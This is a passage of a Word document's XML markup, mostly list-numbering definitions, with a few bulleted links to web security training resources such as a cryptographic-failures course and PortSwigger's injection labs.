            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Watch on YouTube</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2D673042" w14:textId="77777777" w:rsidR="00C93359" w:rsidRDefault="00C93359" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="183"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>A04:2025 - Cryptographic Failures &amp; Web Security Course:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId18" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Watch on YouTube</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6AB3299E" w14:textId="77777777" w:rsidR="00C93359" w:rsidRDefault="00C93359" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="183"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">A05:2025 - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PortSwigger</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Web Security Academy (Injection Labs):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId19" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Access Training Platform</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3F097389" w14:textId="77777777" w:rsidR="00C93359" w:rsidRPr="0083079C" w:rsidRDefault="00C93359" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04CBE3C7" w14:textId="77777777" w:rsidR="000536FF" w:rsidRDefault="000536FF"/>
    <w:sectPr w:rsidR="000536FF">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2FF" w:usb1="5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63678"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8EE0D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C557C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8648F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76277"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="56E85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2837CB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4B8CC1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5B589B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E3024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C06CE6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1CA69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275134"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D8167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AC59BF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7B32B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E602FA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A2ECC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13127B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="70921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7631C2F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D9201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D62F15"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F9AE4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135BB2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F252D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4C1E0C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C8B8B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24492B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6E16C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8A264E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6A664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2F57B3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="78D85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3F06D4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="45D44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846005"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E7B46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9C7E99"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="070EF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C05ABC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="72EC2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CD6EC8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="789C7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01342E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="29ACF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7056CF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="094AE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6F0E99"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="87789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2D092E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9104E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20502A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4928E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9735CF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="16FC3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015FE3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C344B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C40A34"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3E2ED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AC5A75"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="15FE2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214FA3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="ECFAB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9C4267"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="660C3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CFF21C2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6B0E8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574472"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="37704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D88188D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2DA0A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E813BF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="97CE6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E2B0D64"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B052B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F9D756E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B5A6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0AA5C3A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BFE0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0AE7080"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7BA01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1422288"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FC1C6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1876148"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8C900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3216D67"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9C20D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34258B7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="34A27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36B66AE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D0223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4242D3B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B95C9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4591A55"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E2625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459206B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DC94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4F73F58"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BA98F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5EA4E70"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A3F20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78B47C9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="456CB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7CE37A3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3ADA1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81F6281"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="773E2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8F90891"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B02E5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998541E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9B0A7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9EE5598"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="05C47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BC305A0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DD769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C2F3AFF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="058AC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DA147F3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0FA69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E95509A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C8120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F4A794A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9EC0D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F5C1183"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="13585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FCB495C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3D180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1111B33"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="602E6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1803799"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2C447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2DB2E29"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4F76E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3306A2D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="08F61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37B3C82"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0D783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38814E2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AD6C7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59F46EC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FD9E3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6481889"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0FE2C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65641AD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8806D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66F6E0D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6144D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6982095"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="651A3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7712F74"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5B24D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80A0B84"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FDBEE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8141C1F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="34FAE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C350BE5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F588E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C7C0ED8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2AC63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C9677BA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D9C02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CCC22FB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5BA65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CD742C9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C35EA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E115E10"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AB80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F335098"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4BF68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FF71A13"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FBC69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00373C5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="19F42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0385C1F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B0509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09F567E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DA408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0D6087D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9E9A1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1E66824"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1B087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3060419"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B3401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3525AE1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="74346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4B33DB2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2220A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63E0429"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AFFAC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6493140"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="62EA4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6950AA6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="81923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6BC4AE1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D24C4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7096A8B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="25BC1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8E53F98"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FB602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94B1935"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="99222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9771407"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1C844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9C00A64"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BF3E3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AB84C50"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9C18E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B070B04"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="891C9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C064E53"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F41A4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DA92444"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F3105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DCC3DA5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3D067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E8D3390"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="99329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E9B61B0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BC708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13B0EE9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="61C89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19F7E33"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="94503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1FC7A0A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="27344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2030070"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DFD8F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52072D67"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F5BE2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2C05C7A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="21F40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3273A89"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B5FC1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4200AFC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="51C08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44B0D06"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7DD03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49F3176"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="780E3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4C13150"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="18361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5486505"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8398B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55A4462A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D6504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7C72E4A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0EECB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A315F40"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B164B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AD02CB8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B78C1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C5C6C7F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0E228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D0847A8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="75A83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D1A6CE7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6EFE7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D485165"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A656C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DDE508C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9F24A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FDE1287"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="17349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60184716"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A69E7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0601E32"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5254C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0B1375D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5C5E0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618617CA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BB486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2551ECA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BDF4D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2F81FB9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="68703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374376F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CF105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63C7110E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D24C6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6C42E6B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FE76A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6F64AB5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8292B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7376B8B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="039CD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7672ACE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BC00D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7AB4983"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E8FC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7E33BBC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C434B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8803528"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1EE6B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8F97272"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="97C61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BDC2D82"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="39467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C780FCC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5F606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CB1211B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="717E9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CEF60A4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9C527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D0A70AE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2BE41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DEF39BC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="562C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E4E69D1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="ACC6C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E9D5302"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="54D61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FD1730B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5EBEF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1B86F5F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BDC81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26B567B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C5C47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2BC5DE8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A85C6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2BD1106"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="736A1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3EF5C40"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B46A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57B52B6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8CAAF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5F62B9A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F072C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6376E37"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="144E6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64A40EB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="504C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6BF5708"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="52560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6E87E78"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="42B8E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7D5746C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="30989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80F2779"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EB18A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95506C5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E6480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9FB5DA0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="361AC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A056F3F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1C08C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A0B3C34"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="99107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A304A7D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E5F6D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A40490E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E1CE4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A76629F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9698C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B011BBE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FED4D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B762411"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BF0EF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B943DC4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B2A86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C440FA7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7998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D5F7872"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="107CB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D9042B9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F5508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8"/>
  </w:num>
  <w:num w:numId="2">
    <w:abstractNumId w:val="70"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="158"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="179"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="96"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="172"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="44"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="111"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="89"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="48"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="149"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="59"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="34"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="33"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="103"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="108"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="39"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="95"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="23">
    <w:abstractNumId w:val="142"/>
  </w:num>
  <w:num w:numId="24">
    <w:abstractNumId w:val="40"/>
  </w:num>
  <w:num w:numId="25">
    <w:abstractNumId w:val="121"/>
  </w:num>
  <w:num w:numId="26">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="27">
    <w:abstractNumId w:val="168"/>
  </w:num>
  <w:num w:numId="28">
    <w:abstractNumId w:val="100"/>
  </w:num>
  <w:num w:numId="29">
    <w:abstractNumId w:val="182"/>
  </w:num>
  <w:num w:numId="30">
    <w:abstractNumId w:val="159"/>
  </w:num>
  <w:num w:numId="31">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="32">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="33">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="34">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="35">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="36">
    <w:abstractNumId w:val="74"/>
  </w:num>
  <w:num w:numId="37">
    <w:abstractNumId w:val="136"/>
  </w:num>
  <w:num w:numId="38">
    <w:abstractNumId w:val="65"/>
  </w:num>
  <w:num w:numId="39">
    <w:abstractNumId w:val="125"/>
  </w:num>
  <w:num w:numId="40">
    <w:abstractNumId w:val="161"/>
  </w:num>
  <w:num w:numId="41">
    <w:abstractNumId w:val="137"/>
  </w:num>
  <w:num w:numId="42">
    <w:abstractNumId w:val="53"/>
  </w:num>
  <w:num w:numId="43">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="44">
    <w:abstractNumId w:val="81"/>
  </w:num>
  <w:num w:numId="45">
    <w:abstractNumId w:val="61"/>
  </w:num>
  <w:num w:numId="46">
    <w:abstractNumId w:val="86"/>
  </w:num>
  <w:num w:numId="47">
    <w:abstractNumId w:val="63"/>
  </w:num>
  <w:num w:numId="48">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="49">
    <w:abstractNumId w:val="165"/>
  </w:num>
  <w:num w:numId="50">
    <w:abstractNumId w:val="104"/>
  </w:num>
  <w:num w:numId="51">
    <w:abstractNumId w:val="110"/>
  </w:num>
  <w:num w:numId="52">
    <w:abstractNumId w:val="72"/>
  </w:num>
  <w:num w:numId="53">
    <w:abstractNumId w:val="164"/>
  </w:num>
  <w:num w:numId="54">
    <w:abstractNumId w:val="181"/>
  </w:num>
  <w:num w:numId="55">
    <w:abstractNumId w:val="92"/>
  </w:num>
  <w:num w:numId="56">
    <w:abstractNumId w:val="160"/>
  </w:num>
  <w:num w:numId="57">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="58">
    <w:abstractNumId w:val="109"/>
  </w:num>
  <w:num w:numId="59">
    <w:abstractNumId w:val="113"/>
  </w:num>
  <w:num w:numId="60">
    <w:abstractNumId w:val="154"/>
  </w:num>
  <w:num w:numId="61">
    <w:abstractNumId w:val="76"/>
  </w:num>
  <w:num w:numId="62">
    <w:abstractNumId w:val="147"/>
  </w:num>
  <w:num w:numId="63">
    <w:abstractNumId w:val="144"/>
  </w:num>
  <w:num w:numId="64">
    <w:abstractNumId w:val="118"/>
  </w:num>
  <w:num w:numId="65">
    <w:abstractNumId w:val="94"/>
  </w:num>
  <w:num w:numId="66">
    <w:abstractNumId w:val="163"/>
  </w:num>
  <w:num w:numId="67">
    <w:abstractNumId w:val="85"/>
  </w:num>
  <w:num w:numId="68">
    <w:abstractNumId w:val="93"/>
  </w:num>
  <w:num w:numId="69">
    <w:abstractNumId w:val="57"/>
  </w:num>
  <w:num w:numId="70">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="71">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="72">
    <w:abstractNumId w:val="56"/>
  </w:num>
  <w:num w:numId="73">
    <w:abstractNumId w:val="66"/>
  </w:num>
  <w:num w:numId="74">
    <w:abstractNumId w:val="98"/>
  </w:num>
  <w:num w:numId="75">
    <w:abstractNumId w:val="58"/>
  </w:num>
  <w:num w:numId="76">
    <w:abstractNumId w:val="115"/>
  </w:num>
  <w:num w:numId="77">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="78">
    <w:abstractNumId w:val="174"/>
  </w:num>
  <w:num w:numId="79">
    <w:abstractNumId w:val="107"/>
  </w:num>
  <w:num w:numId="80">
    <w:abstractNumId w:val="46"/>
  </w:num>
  <w:num w:numId="81">
    <w:abstractNumId w:val="139"/>
  </w:num>
  <w:num w:numId="82">
    <w:abstractNumId w:val="152"/>
  </w:num>
  <w:num w:numId="83">
    <w:abstractNumId w:val="101"/>
  </w:num>
  <w:num w:numId="84">
    <w:abstractNumId w:val="180"/>
  </w:num>
  <w:num w:numId="85">
    <w:abstractNumId w:val="132"/>
  </w:num>
  <w:num w:numId="86">
    <w:abstractNumId w:val="102"/>
  </w:num>
  <w:num w:numId="87">
    <w:abstractNumId w:val="43"/>
  </w:num>
  <w:num w:numId="88">
    <w:abstractNumId w:val="62"/>
  </w:num>
  <w:num w:numId="89">
    <w:abstractNumId w:val="35"/>
  </w:num>
  <w:num w:numId="90">
    <w:abstractNumId w:val="134"/>
  </w:num>
  <w:num w:numId="91">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="92">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="93">
    <w:abstractNumId w:val="176"/>
  </w:num>
  <w:num w:numId="94">
    <w:abstractNumId w:val="120"/>
  </w:num>
  <w:num w:numId="95">
    <w:abstractNumId w:val="55"/>
  </w:num>
  <w:num w:numId="96">
    <w:abstractNumId w:val="124"/>
  </w:num>
  <w:num w:numId="97">
    <w:abstractNumId w:val="112"/>
  </w:num>
  <w:num w:numId="98">
    <w:abstractNumId w:val="141"/>
  </w:num>
  <w:num w:numId="99">
    <w:abstractNumId w:val="47"/>
  </w:num>
  <w:num w:numId="100">
    <w:abstractNumId w:val="145"/>
  </w:num>
  <w:num w:numId="101">
    <w:abstractNumId w:val="131"/>
  </w:num>
  <w:num w:numId="102">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="103">
    <w:abstractNumId w:val="128"/>
  </w:num>
  <w:num w:numId="104">
    <w:abstractNumId w:val="41"/>
  </w:num>
  <w:num w:numId="105">
    <w:abstractNumId w:val="84"/>
  </w:num>
  <w:num w:numId="106">
    <w:abstractNumId w:val="83"/>
  </w:num>
  <w:num w:numId="107">
    <w:abstractNumId w:val="64"/>
  </w:num>
  <w:num w:numId="108">
    <w:abstractNumId w:val="166"/>
  </w:num>
  <w:num w:numId="109">
    <w:abstractNumId w:val="79"/>
  </w:num>
  <w:num w:numId="110">
    <w:abstractNumId w:val="119"/>
  </w:num>
  <w:num w:numId="111">
    <w:abstractNumId w:val="73"/>
  </w:num>
  <w:num w:numId="112">
    <w:abstractNumId w:val="68"/>
  </w:num>
  <w:num w:numId="113">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="114">
    <w:abstractNumId w:val="106"/>
  </w:num>
  <w:num w:numId="115">
    <w:abstractNumId w:val="77"/>
  </w:num>
  <w:num w:numId="116">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="117">
    <w:abstractNumId w:val="116"/>
  </w:num>
  <w:num w:numId="118">
    <w:abstractNumId w:val="167"/>
  </w:num>
  <w:num w:numId="119">
    <w:abstractNumId w:val="153"/>
  </w:num>
  <w:num w:numId="120">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="121">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="122">
    <w:abstractNumId w:val="171"/>
  </w:num>
  <w:num w:numId="123">
    <w:abstractNumId w:val="129"/>
  </w:num>
  <w:num w:numId="124">
    <w:abstractNumId w:val="140"/>
  </w:num>
  <w:num w:numId="125">
    <w:abstractNumId w:val="75"/>
  </w:num>
  <w:num w:numId="126">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="127">
    <w:abstractNumId w:val="50"/>
  </w:num>
